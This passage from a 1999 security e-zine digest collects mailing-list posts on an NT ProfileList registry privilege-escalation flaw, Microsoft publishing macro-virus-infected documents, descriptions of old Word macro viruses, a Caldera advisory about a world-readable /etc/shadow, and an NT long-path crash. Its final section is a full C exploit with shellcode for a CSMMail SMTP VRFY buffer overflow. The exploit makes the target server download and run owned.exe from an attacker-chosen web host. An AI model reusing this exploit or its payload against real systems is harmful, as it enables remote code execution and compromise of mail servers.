had an extended discussion on that topic in this list nearly a year ago.
> By default, the permissions on the ProfileList registry key
> grants the Everybody group the SetValue permission
If I'm not mistaken, only the system account ever accesses this key. At
least that's what I found when auditing this tree several months ago.
> Consequently a malicious
> user of the system could change another user's
> ProfileImagePath and get it to load a different profile (eg
> c:\trojaned-profile) that contains entries in the Start Up
> folder that will run when that user next logs on to that system.
If we're going to start worrying about this one, this is just one of many
modifications that need to be made. The best collection of resources in
this area remains (IMHO) Steve Sutton's NSA paper at www.trustedsystems.com
> Editing these Registry keys can be done local or from across
> the network.
This is only true of the server. A currently patched workstation requires
admin access to open this portion of the registry across the network.
However, to actually _trojan_ someone, you also must have the ability to
insert new profiles under %systemroot%\Profiles, which is typically NOT
available on a server. A good solution for a server would be to make the
permissions on the parent key admins, system, and server ops. If the group
of users who you expect to be logging on at the console of a server were
more diverse, then I would recommend creating a group for just that purpose
and setting the permissions to admins, system, and the group you
established.
So unless you're worried about a workstation with serial users, it turns out
that the complete requirements to really carry out an attack are seldom met.
> Once they have logged onto the domain they use reg.exe to
> open the Administrator's ProfileList key. This is easily
> found as it is the SID with a RID of 500. They then edit the
> ProfileImagePath to point to \\DODGY\C$\profile .
I would suggest that you actually try your scenarios. I have tried this,
and it doesn't work. The admin will get the profile for the default user.
The same is true if you try to point the profile anywhere else than
%systemroot%profiles.
> Resolution: The winlogon.exe process actually creates the new
> subkey when a user logs on - and the key is _not_ created in
> the security context of the user currently logging on but
> rather the SYSTEM account. Only the SYSTEM account, then,
> needs write access to the ProfileList key and Everyone else
> should be given only Read Access. Doing this will not prevent
> new users from logging on and they "SID" subkey is still created.
I recommended doing this some months ago. It is still not completely clear
that this won't break something somewhere. As always, people should try
this in their own systems and be sure something doesn't break. Another way
to go at this one would be to put an app or script in the default user's
startup group that would set the permissions to admins, system and that
user. I believe supercacls (also from Steve Sutton) could be used to do
this.
-------------------------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 12:31:21 -0700
From: Paul Leach <paulle@MICROSOFT.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
> -----Original Message-----
> From: dan koons [mailto:dkoons@secured.net]
> Sent: Thursday, April 29, 1999 11:52 AM
> To: Paul Leach
> Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: Re: NT Security Advisory: Domain user to Domain Admin -
> Profiles and the Registry
>
> strange. i just followed your explicit instructions, grabbed
> the first
> file that turned up (which was called "securing windows nt
> installation"
> and was dated october 23, 1997) and searched it for the string
> 'ProfileList' and was unable to find any matches.
Here's a relevant section of the text, cut and paste from the doc:
<quote>
Protecting the Registry
In addition to the considerations for standard security, the administrator
of a high-security installation might want to set protections on certain
keys in the registry.
By default, protections are set on the various components of the registry
that allow work to be done while providing standard-level security. For
high-level security, you might want to assign access rights to specific
registry keys. This should be done with caution, because programs that the
users require to do their jobs often need to access certain keys on the
users' behalf. For more information, see Chapter 24, "Registry Editor and
Registry Administration."
For each of the keys listed below, make the following change:
Access allowed
Everyone Group QueryValue, Enumerate Subkeys, Notify and Read Control
In the HKEY_LOCAL_MACHINE on Local Machine dialog:
\Software
This change is recommended. It locks the system in terms of who can
install software.
Note that it is not recommended that the entire subtree be locked
using this setting
because that can render certain software unusable.
\Software\Microsoft\RPC (and its subkeys)
This locks the RPC services.
\Software\Microsoft\Windows NT\ CurrentVersion
\Software\Microsoft\Windows NT\ CurrentVersion\Profile List
\Software\Microsoft\Windows NT\ CurrentVersion\AeDebug
\Software\Microsoft\Windows NT\ CurrentVersion\Compatibility
<end quote>
So it appears that there's a space in the spelling in the document. In the
registry, there's no space. I'll report the bug.
Perhaps all the clones of the document you cited also copied the spelling
error :-)
Paul
-------------------------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 12:00:56 -0700
From: dan koons <dkoons@SECURED.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
On Thu, 29 Apr 1999, dan koons wrote:
> further, in the "windows nt security guidelines" developed for nsa
> research (found at http://www.trustedsystems.com/NSAGuide.htm), the united
> states department of energy's "windows nt security advisor" (at
> http://doe-is.llnl.gov/SecRes/CustomTools/secadvisor.pdf), the united
> states navy's "navy secure windows nt 4.0 installation and configuration
> guide" (at http://infosec.navy.mil/COMPUSEC/ntsecure.html), and the
> "hardening of windows nt 4.0" (at
> http://pw2.netcom.com/~honeyluv/index.html), a search for the string
> 'ProfileList' also does not yield any results.
oops; my mistake. the navy guide DOES recommend setting the 'ProfileList'
key to 'read' for 'Authenticated Users'. but i could not find any
reference to the key in any of the other documents.
dan
_____________________________________________________________________
daniel e koons dkoons@secured.net
_____________________________________________________________________
-------------------------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 13:35:36 -0700
From: Paul Leach <paulle@MICROSOFT.COM>
To: BUGTRAQ@netspace.org
Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
-----Original Message-----
>From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK]
Sent: Wednesday, April 28, 1999 12:37 PM
To: BUGTRAQ@NETSPACE.ORG
Subject: NT Security Advisory: Domain user to Domain Admin - Profiles and
the Registry
Problem : NT users can cause other users of the system to load a "trojaned"
profile that could lead to a system compromise. This issue has been here for
as long as NT 4 has, but I'm not sure if anybody has picked this particular
issue up.
Details: When a user logs onto an NT Workstation or Server a new subkey is
written to the HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
registry key. The name of this new key is that of the user's Security
Identifier or SID. One of the values of this key is the ProfileImagePath
which points to the location of the user's profile directory. This can
reference a local path (eg %systemroot%\profiles\acc_name) or a UNC path (eg
\\PDC\profiles\acc_name).
This is indeed an issue. It is documented in the "Securing Windows NT"
whitepaper,
http://www.microsoft.com/NTServer/security/exec/overview/Secure_NTInstall.as
p
<http://www.microsoft.com/NTServer/security/exec/overview/Secure_NTInstall.a
sp>
and anyone who has implemented those recommendations will be safe against
this vulnerability.
(NB: The registry key is misspelled "Profile List" in the document.)
Also, the SCE templates in SP4/SP5 included one designed to help automate
the recommendatiaons in the whitepaper -- securws4.inf, IIRC. However, we
just examined it and it allows "Power Users" (abbreviated "PU") to write the
key. It'll be fixed in SP6. In the meantime, one can hand edit the entry for
ProfileList in the template. Find the line that looks like this:
"MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\ProfileList",2,"D:P(A;CI;GR;;;AU)(A;CI;GA;;;DA)(A;CI;GA;;;
SY)(A;CI;GA;;;CO)(A;CI;GRGW;;;PU)"
and get rid of the "(A;CI;GRGW;;;PU)" at the end.
Paul
-------------------------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 13:53:05 -0700
From: Paul Leach <paulle@MICROSOFT.COM>
To: BUGTRAQ@netspace.org
Subject: Security Configuration Editor info
Since I said that SCE could be used to fix the ProfileList bug that Mnemonix
reported, I got a private request asking where more information about SCE
(Security Configuration Editor) could be found -- they'd tried the usual
places.
I think they changed the name since SP4 to "Security Configuration Manager",
but I called it SCE becaue most people know it by the old name, since that's
what it was called in SP4. I did a search on that exact phrase at
www.microsoft.com and got a lot of hits, the first one was
http://www.microsoft.com/NTServer/security/techdetails/prodarch/securconfig.
asp
<http://www.microsoft.com/NTServer/security/techdetails/prodarch/securconfig
.asp>
which looks pretty good. In general, a good place to look for security info
on MS products is
http://www.microsoft.com/security/Resources/whitepapers.as
<http://www.microsoft.com/security/Resources/whitepapers.asp> p
Paul
@HWA
40.0 Microsoft is a virus, oh sorry I mean new microsoft virus problem...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
microsoft.virus.txt - Microsoft yet again releases virus infected MS Word
documents on their own web site! If you have visited
http://www.microsoft.com/uk/business_technology/dns/ecommerce/financial/case.htm
recently to find out more about MS Exchange and E-commerce, then you should scan
for the W97M/Marker.C virus on your network. This has happened numerous times, and
Microsoft STILL cannot manage to check documents for
viruses before releasing them on their web site. Thanks a fucking lot, Microsoft!
Date: Sun, 25 Apr 1999 13:13:34 +0100
>From: T Bruce Tober <octobersdad@reporters.net>
Subject: You'd think they'd know better...
...or maybe not. I mean, it is Microcrap we're talking about here, viz this
article from Woody's (Woody's Office Watch), and if there's anyone more
pro-Microsoft it's only Bill G himself,:
(Read the complete story http://www.wopr.com/ )
TRUST NO ONE [...]
Microsoft has in the past released virus infected documents on their web
site and by other means. WOW has had to publish warnings several times.
Sadly it's happened again. Anyone visiting
http://www.microsoft.com/uk/business_technology/dns/ecommerce/financial/case.htm
to find out more about MS Exchange and E-commerce got more than they
bargained for when they downloaded any of the case study documents. All
were infected with W97M/Marker.C virus! Apparently no-one at Microsoft
checked the documents before making them publicly available [...]
Bruce Tober, <octobersdad@reporters.net>, <http://www.crecon.demon.co.uk>
Birmingham, UK, EU +44-121-242-3832 soon at <http://www.star-dot-star.co.uk>
RISKS-LIST: Risks-Forum Digest Weds 28 April 1999 Volume 20 : Issue 34
@HWA
41.0 Some new viruses from http://www.wopr.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DMV, Hot, FormatC, Wiederoffnen
DMV
DMV is probably the first Word macro virus to have been written. It is test virus, written by a person called Joel McNamara
to study the behavior of macro viruses. As such, it is no threat - it announces its presence in the system, and keeps the user
informed of its actions.
McNamara wrote DMV in the fall of 1994 - at the same time, he published a detailed study about macro viruses. He kept
his test virus under wraps until a real macro virus, Concept, was discovered. At that time, he decided to make DMV known
to the public. We can expect to see new variants of the DMV virus, as well as totally new viruses inspired by the techniques
used in this virus. McNamara also published a skeleton for a virus to infect Microsoft Excel spreadsheet files.
Hot
Hot was the first Word macro virus written in Russia. It was found in the wild over there in January 1996.
It spreads in a similar manner as the Concept virus: when an infected DOC is first opened, the virus modifies the
NORMAL.DOT file, and will spread to other documents after that. Unlike the earlier Word macro viruses, Hot does not
replicate with the File/Save As command - it infects only during the basic File/Save command. This means that Hot will infect
only existing documents in the system - not new ones.
Infected documents contain the following four macros, which are visible in the macro list:
AutoOpen
DrawBringInFrOut
InsertPBreak
ToolsRepaginate
When Hot infects NORMAL.DOT, it renames these macros to:
StartOfDoc
AutoOpen
InsertPageBreak
FileSave
Macros are saved with the 'execute-only' feature, which means that a user can't view or edit them.
Hot contains a counter. It adds a line like this to the WINWORD6.INI file:
QLHot=35112
This number is based on the number of days in this century. Hot adds 14 to this number and then waits until this latency time
of 14 days has passed. Hot will spread normally during this time, it will just not activate.
After the 14 day pause, there is a 1 in 7 chance that a document will be erased when it is opened. The Virus will delete all
text and re-save the document. Hot does not do this, if it find a file called EGA5.CPI from the C:\DOS directory. A
comment in the source code of the virus hints that this feature is added so that the author of the virus and his friends can
protect themselves from the activation damage:
'---------------------------------------------------------------
'- Main danger section: if TodayNo=(QLHotDateNo + RndDateNo) ---
'- and if File C:DOSega5.cpi not exist (not for OUR friends) -
'---------------------------------------------------------------
By default, there is no file by the name EGA5.CPI in MS-DOS distributions.
Hot was the first macro virus to use external functions. This system allows Word macros to call any standard Windows API
call. The use of external functions specific to Windows 3.1x means that Hot will be unable to spread under Word for
Macintosh or Word 7 for Windows 95: opening an infected document will just produce an error message.
FormatC
This is not a virus, but a trojan because it does not replicate. It does, however, format your C: drive as soon as the document
is opened. This trojan was posted to a Usenet newsgroup.
Wiederoffnen
Wiederoffnen is not a virus, but a Word macro trojan. It comes in a Microsoft Word 2 document but works perfectly under
Word 6 too. Wiederoffnen intercepts the AutoClose macro and when the document is closed plays tricks with
AUTOEXEC.BAT.
@HWA
42.0 Caldera COAS may leave shadowed password file readable...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 27 Apr 1999 20:26:16 -0600
From: synapse <syn@TOXYGENE.MADSCIENCE.NU>
To: BUGTRAQ@netspace.org
Subject: Caldera Advisory
Heya Aleph,
Not sure if this had come accross the list.
-----BEGIN PGP SIGNED MESSAGE-----
______________________________________________________________________________
Caldera Systems, Inc. Security Advisory
Subject: COAS
Advisory number: CSSA-1999:009.0
Issue date: 1999 04 27
Cross reference:
______________________________________________________________________________
1. Problem Description
/etc/shadow may get world readable
2. Vulnerable Versions
Systems: OpenLinux 2.2.
Packages: previous to coas-1.0-8
3. Solutions
The proper solution is to upgrade to the coas-1.0-8 package.
If /etc/shadow is world-readable, this is fixed with
chmod 600 /etc/shadow
4. Location of Fixed Packages
The upgrade packages can be found on Caldera's FTP site at:
ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.2/current/RPMS/
The corresponding source code package can be found at:
ftp://ftp.calderaystems.com/pub/OpenLinux/updates/2.2/current/SRPMS
5. Installing Fixed Packages
Upgrade the affected packages with the following commands:
rpm -q coas && rpm -U coas-1.0-8.i386.rpm
6. Verification
The MD5 checksums (from the "md5sum" command) for these packages are:
1efa8cde40f5684293e03c2499f2f59f README
b3fa473f6ba574052991bf2254bd378d RPMS/coas-1.0-8.i386.rpm
3bfa00aa3230f97537e8baa2c0454d08 SRPMS/coas-1.0-8.src.rpm
7. References
This and other Caldera security resources are located at:
http://www.calderasystems.com/news/security/index.html
Additional documentation on this problem can be found in:
This security fix closes Caldera's internal Problem Report 4544.
8. Disclaimer
Caldera Systems, Inc. is not responsible for the misuse of any of the
information we provide on this website and/or through our security
advisories. Our advisories are a service to our customers intended to
promote secure installation and use of Caldera OpenLinux.
______________________________________________________________________________
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
iQCVAwUBNyW4/+n+9R4958LpAQHntgP/cHhIOaKUPRfeBOtMQP7lZ2NQlEPrqzkq
cu/Q9IvIqrvm/mFikznaMTdehz0Jql2NuY2Zjs0MUdF0Rm7KsgBQ6BYX+10GAE2W
HAZIuYQ2zeM2acGcrvzGYExkKmrLOfhD77V9l7rZ9WieQO7B8vmj5N4nGdkUNz2U
j+AigG8FJNI=
=O2I/
-----END PGP SIGNATURE-----
@HWA
43.0 NT4+SP4 filename length vulnerabilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bug in WinNT 4.0 SP4
Alvaro Gilabert (agilabert@RIBA.ES)
Mon, 19 Apr 1999 15:15:36 +-200
Hi,
I supose it is a bug and I will explain why do I think so
You can exceed the limit in the number of chars allowed in a filename.
WinNT does allow it. You can move a folder to a deeper one exceeding it.
But, when you try to backup that folder, the backup program (BackupExec
and WinNT Backup) crashes and reboots the server. If you try to backup
thru a network drive (using another server and mapping that folder), then
it crashes and reboot the server also. Not the server that is making the
backup but the server that has the wrong folder. That's a but because WinNT,
supposing to be a fileserver, should take care of this. Recently, Mindspring
released a report comparing WinNT vs. RedHat, sponsored by Microsoft. This
point was missed in the comparison.
Alvaro Gilabert
ICQ UIN 2316344
-----------------------------------------------------------------
Re: Bug in WinNT 4.0 SP4
David LeBlanc (dleblanc@MINDSPRING.COM)
Tue, 20 Apr 1999 07:12:23 -0700
At 03:15 PM 4/19/99 +-200, Alvaro Gilabert wrote:
>Hi,
>I supose it is a bug and I will explain why do I think so
>You can exceed the limit in the number of chars allowed in a filename.
WinNT does allow it. You can move a folder to a deeper one exceeding it.
That's because the limit isn't where you think it is. From the
documentation on CreateFile in the SDK:
Windows NT: You can use paths longer than MAX_PATH characters by calling
the wide (W) version of CreateFile and prepending �\\?\� to the path. The
�\\?\� tells the function to turn off path parsing. This lets you use paths
that are nearly 32,000 Unicode characters long. You must use
fully-qualified paths with this technique. This also works with UNC names.
The �\\?\� is ignored as part of the path. For example,
�\\?\C:\myworld\private� is seen as �C:\myworld\private�, and
�\\?\UNC\tom_1\hotstuff\coolapps� is seen as �\\tom_1\hotstuff\coolapps�.
===============================
So it seems that if you use the APIs properly, you can deal with extremely
long paths. When you move things around, it is very likely that you are
dealing with relative names, not absolute names.
David LeBlanc
dleblanc@mindspring.com
-----------------------------------------------------------------
Re: Bug in WinNT 4.0 SP4
Paul Gracy (paul.gracy@COMPGEN.COM)
Mon, 26 Apr 1999 16:36:11 -0400
I must disagree. Any action that a program takes that can crash a server is
a bug. Period.
The fact that properly using the SDK and following all the 'rules of
microsoft' would prevent the crash is not an excuse. When the application
tries to do something that would cause a crash, the OS should whack the
offender's knuckles (see Dr. Watson), not curl up and die.
I am tired of bad code being given excuses. If MS wants to run large,
mission-critical / business-critical systems, they should fix their code.
IMHO.
=========================
Paul H. Gracy
paul.gracy@compgen.com
phone: 404 705 2873
#include <std.disclaimer>
=========================
> -----Original Message-----
> From: David LeBlanc [SMTP:dleblanc@MINDSPRING.COM]
> Sent: Tuesday, April 20, 1999 10:12 AM
> To: BUGTRAQ@netspace.org
> Subject: Re: Bug in WinNT 4.0 SP4
>
> At 03:15 PM 4/19/99 +-200, Alvaro Gilabert wrote:
> >Hi,
> >I supose it is a bug and I will explain why do I think so
> >You can exceed the limit in the number of chars allowed in a filename.
> WinNT does allow it. You can move a folder to a deeper one exceeding it.
>
> That's because the limit isn't where you think it is. From the
> documentation on CreateFile in the SDK:
>
> Windows NT: You can use paths longer than MAX_PATH characters by calling
> the wide (W) version of CreateFile and prepending "\\?\" to the path. The
> "\\?\" tells the function to turn off path parsing. This lets you use
> paths
> that are nearly 32,000 Unicode characters long. You must use
> fully-qualified paths with this technique. This also works with UNC names.
> The "\\?\" is ignored as part of the path. For example,
> "\\?\C:\myworld\private" is seen as "C:\myworld\private", and
> "\\?\UNC\tom_1\hotstuff\coolapps" is seen as "\\tom_1\hotstuff\coolapps".
> ===============================
>
> So it seems that if you use the APIs properly, you can deal with extremely
> long paths. When you move things around, it is very likely that you are
> dealing with relative names, not absolute names.
>
>
> David LeBlanc
> dleblanc@mindspring.com
-----------------------------------------------------------------
Re: Bug in WinNT 4.0 SP4
David LeBlanc (dleblanc@MINDSPRING.COM)
Tue, 27 Apr 1999 13:13:54 -0700
At 04:36 PM 4/26/99 -0400, Paul Gracy wrote:
>I must disagree. Any action that a program takes that can crash a server is
>a bug. Period.
I did not say it wasn't a bug. A bug, by definition, is something that
causes an application (or even the whole OS) to crash or otherwise
malfunction. So you are not disagreeing with anything I _said_. If you
can make something go splat, then it is a bug. No arguments there.
>The fact that properly using the SDK and following all the 'rules of
>microsoft' would prevent the crash is not an excuse.
No excuses were being made. Please do not manufacture excuses when they
are not present.
The only point was that Alvaro seemed to think that it was a problem that
moving a folder could result in a total path which is > MAX_PATH. So far
as I know, this isn't a problem, since if you are correctly handling the
open, you can deal with extremely long paths. I thought that others might
have the same sort of issue, and also thought that few people would know
that bit of arcane trivia, so I was trying to point out how you might deal
with this correctly. In general, using API calls correctly, and knowing
various bits of trivia from the documentation is a Good Thing, and perhaps
might save others from having their app go down.
I was NOT saying that crashing is not a bug. That would be ridiculous.
Neither the little backup app that comes with NT, or the Seagate product
(which as far as I know, both sprung from Arcada, which Seagate bought) are
favorites of mine. And before anyone asks, I really don't have something I
can recommend.
David LeBlanc
dleblanc@mindspring.com
-----------------------------------------------------------------
Date: Tue, 27 Apr 1999 21:03:52 +0200
From: tschweikle@FIDUCIA.DE
To: BUGTRAQ@netspace.org
Subject: Antwort: Re: Bug in WinNT 4.0 SP4
David LeBlanc wrote:
>At 03:15 PM 4/19/99 +-200, Alvaro Gilabert wrote:
>>Hi,
>>I supose it is a bug and I will explain why do I think so
>>You can exceed the limit in the number of chars allowed in a filename.
>WinNT does allow it. You can move a folder to a deeper one exceeding it.
>
>That's because the limit isn't where you think it is. From the
>documentation on CreateFile in the SDK:
>
>Windows NT: You can use paths longer than MAX_PATH characters by calling
>the wide (W) version of CreateFile and prepending *\\?\* to the path. The
>*\\?\* tells the function to turn off path parsing. This lets you use paths
>that are nearly 32,000 Unicode characters long. You must use
>fully-qualified paths with this technique. This also works with UNC names.
>The *\\?\* is ignored as part of the path. For example,
>*\\?\C:\myworld\private* is seen as *C:\myworld\private*, and
>*\\?\UNC\tom_1\hotstuff\coolapps* is seen as *\\tom_1\hotstuff\coolapps*.
>===============================
>
>So it seems that if you use the APIs properly, you can deal with extremely
>long paths. When you move things around, it is very likely that you are
>dealing with relative names, not absolute names.
>
>
>David LeBlanc
>dleblanc@mindspring.com
While following this tread I tried it out. View seconds later my NT server
rebooted.
Trying to create a 'reboot-server-path' from a client - impossible. Seems as if
such path must be created from server console. But what about a carefully
designed program installabel on the server, using the wide variant to create
directories - creating paths exceeding MAX_PATH then setting a share to such a
program?
WinNT crashes within this scenario, every time a client wants to access this
share.
One simpler scenario: install a service. Exceed MAX_PATH. Start this service at
system startup - watch the server rebooting.
THIS IS A BUG - No excuse.
---
Thomas Schweikle <tschweikle@fiducia.de>
@HWA
44.0 CSMMail Windows SMTP Server Remote Buffer Overflow Exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 27 Apr 1999 13:44:51 -0400
From: pw <pw@NACS.NET>
To: BUGTRAQ@netspace.org
Subject: CSMMail Windows SMTP Server Remote Buffer Overflow Exploit
CSMMail is a SMTP server for win95/98/NT with features that
include at least five stack overflows. At least two of these allow remote
execution of arbitrary code.
The first the overflow is found in the HELO command, there is also
an overflow in the MAIL FROM: command, however, I have been unable to get
either of these to return to an arbitrary address.
The next overflow I found was in the VRFY command, when a long string is
used as an argument ("VRFY aaaaaaa....") one can overwrite the return
address and force the server to return to arbitrary code. This is the
overflow the following exploit takes advantage of.
There is also another buffer overflow in the VRFY command which
happens if one enters "VRFY aaaa@aaaaaaa......" I have not been able to
make this return to an arbitrary address.
The RCPT TO: command also has a overflow in it that can be used to
return to arbitrary code.
There are two main problems which are run into when exploiting the
first hole in the VRFY command. The first one is trivial to get around.
If a "@" sign (40h) is found on the buffer being copied and the buffer is
excessively long it will not overflow the buffer. To get around this we
just make sure 40h is not in our code or offseted addresses.
The next problem stems from the fact that CSM Mail has no DLL's of
it's own which are loaded in its address space and it's Image Base is
00400000h. Since we will have to include a null to address to any of
CSMMail's code there is no sure way to return to our code. To get around
this I have included multiple return addresses in the exploit which are
bound directly to the operating system version which CSM Mail is running
under.
It is also worth noting that two of the arguments for
the function which is having it's return address overwritten need to be
fixed up with a valid read memory location in order to bypass page faults.
The exploit that is included below will force CSMMail to connect
to a specified web server and download, save and execute a file from it.
The exploit should work under x86 unix's and x86 versions of win32. By
default it is set to be compiled under unix, to compile it under win32
take out the "#define UNIX." I would like to thank Acpizer for
porting this to win32 and determining the SP3 address values.
I do not know of any bugfixes for this and this exploit
works on the current version which is being distributed from their
site. (It did the last time I checked it)
-mcp
<--------------------------CUT HERE------------------------->
#define UNIX
#ifndef UNIX
#include <stdio.h>
#include <fcntl.h>
#include <winsock.h>
#include <io.h>
#define CLOSE _close
#define SLEEP Sleep
#else
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#define CLOSE close
#define SLEEP sleep
#endif
/*
CSMMail Exploit by _mcp_ <pw@nacs.net>
Win32 port and sp3 address's by Acpizer <acpizer@unseen.org>
Greets go out to the following people: Morpheus, Sizban, Rocket,
Acpizer, Killspree, Ftz, Dregvant, Vio, Symbiont, Coolg, Henk, #finite
and #win32asm.
You can contact me by e-mail or on efnet.
As always no greets go out to etl
*/
const unsigned long FIXUP1 = 264;
const unsigned long FIXUP2 = 268;
const unsigned long OFFSET = 260;
char code[] =
"\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1"
"\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF"
"\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x48\xC1\xE3\x10\x66\xBB"
"\x94\x62\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46"
"\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x48\xC1\xE3"
"\x10\x66\xBB\xB8\x62\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66"
"\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33"
"\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51"
"\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6"
"\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF"
"\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57"
"\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1"
"\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66"
"\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D"
"\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46"
"\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F"
"\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71"
"\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66"
"\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53"
"\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30"
"\x30\x00";
/*This is the encrypted /~pw/owned.exe we paste at the end */
char dir[] =
"\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0";
unsigned int getip(char *hostname)
{
struct hostent *hostinfo;
unsigned int binip;
hostinfo = gethostbyname(hostname);
if(!hostinfo)
{
printf("cant find: %s\n",hostname);
exit(0);
}
#ifndef UNIX
memcpy((char *)&binip, hostinfo -> h_addr, hostinfo -> h_length);
#else
bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length);
#endif
return(binip);
}
int usages(char *fname)
{
printf("CSMMail Remote Buffer Overflow exploit v1.1 by _mcp_ <pw@nacs.net>.\n");
printf("Win32 porting and nt sp3 address's by Acpizer <acpizer@unseen.org>\n");
printf("Usages: \n");
printf("%s <target host> <www site> <fixup address> <return address>\n", fname);
printf("win98 SP1:\n");
printf(" <fixup address> = 0xBFF78030\n");
printf(" <return address> = 0xBFF79243\n");
printf("NT SP3:\n");
printf(" <fixup address> = 0x77EB14C0\n");
printf(" <return address> = 0x77E53FC7\n");
printf("NT SP4:\n");
printf(" <fixup address> = 0x77EB14C0\n");
printf(" <return address> = 0x77E9A3A4\n");
printf("Will make <target host> running CSMMail download, save, and\n");
printf("execute http://<www site>/~pw/owned.exe\n");
exit(0);
}
main (int argc, char *argv[])
{
int sock,targethost,sinlen;
struct sockaddr_in sin;
static unsigned char buffer[20000];
unsigned char *ptr,*ptr2;
unsigned long ret_addr;
int len,x = 1;
unsigned long rw_mem;
#ifndef UNIX
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0) exit(1);
#endif
if (argc < 5) usages(argv[0]);
targethost = getip(argv[1]);
len = strlen(argv[2]);
if (len > 60)
{
printf("Bad http format!\n");
usages(argv[0]);
}
ptr = argv[2];
while (x <= len)
{
x++;
(*ptr)++; /*Encrypt the http ip for later parsing */
ptr++;
}
if( (sscanf(argv[3],"0x%x",(unsigned long *) &rw_mem)) == 0)
{
printf("Input Error, the fixup memory address has incorrect format\n");
exit(0);
}
if( (sscanf(argv[4],"0x%x",(unsigned long *) &ret_addr)) == 0)
{
printf("Input error, the return address has incorrect format\n");
exit(0);
}
sock = socket(AF_INET,SOCK_STREAM,0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = targethost;
sin.sin_port = htons(25);
sinlen = sizeof(sin);
printf("Starting to create the egg\n");
ptr = (char *)&buffer;
strcpy(ptr,"VRFY ");
ptr+=5;
memset((void *)ptr, 0x90, 7000);
ptr2=ptr;
ptr2+=FIXUP1;
memcpy((void *) ptr2,(void *) &rw_mem,4);
ptr2=ptr;
ptr2+=FIXUP2;
memcpy((void *) ptr2,(void *) &rw_mem,4);
ptr+=OFFSET;
memcpy ((void *) ptr,(void *)&ret_addr, 4);
ptr+=60;
memcpy((void *) ptr,(void *)&code,strlen(code));
(char *) ptr2 = strstr(ptr,"\xb1");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2++;
(*ptr2)+= len + ( sizeof(dir) - 1 );
(char *) ptr2 = strstr(ptr,"\x83\xc6");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2+= 2;
(*ptr2)+= len + 8;
ptr+=strlen(code);
memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http
site's info */
ptr+=len;
memcpy((void *) ptr,(void*) &dir, sizeof(dir) );
printf("Made the egg\n");
if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
{
perror("error:");
exit(0);
}
printf("Connected.\n");
#ifndef UNIX
send(sock, "HELO lamer.com\r\n",16, 0);
send(sock, (char *)&buffer, strlen((char *)&buffer), 0);
send(sock,"\r\n",2,0);
#else
write(sock, "HELO lamer.com\r\n",16);
write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char
*)&buffer */
write(sock,"\r\n",2);
#endif
SLEEP(1);
printf("Sent the egg\n");
#ifndef UNIX
WSACleanup();
#endif
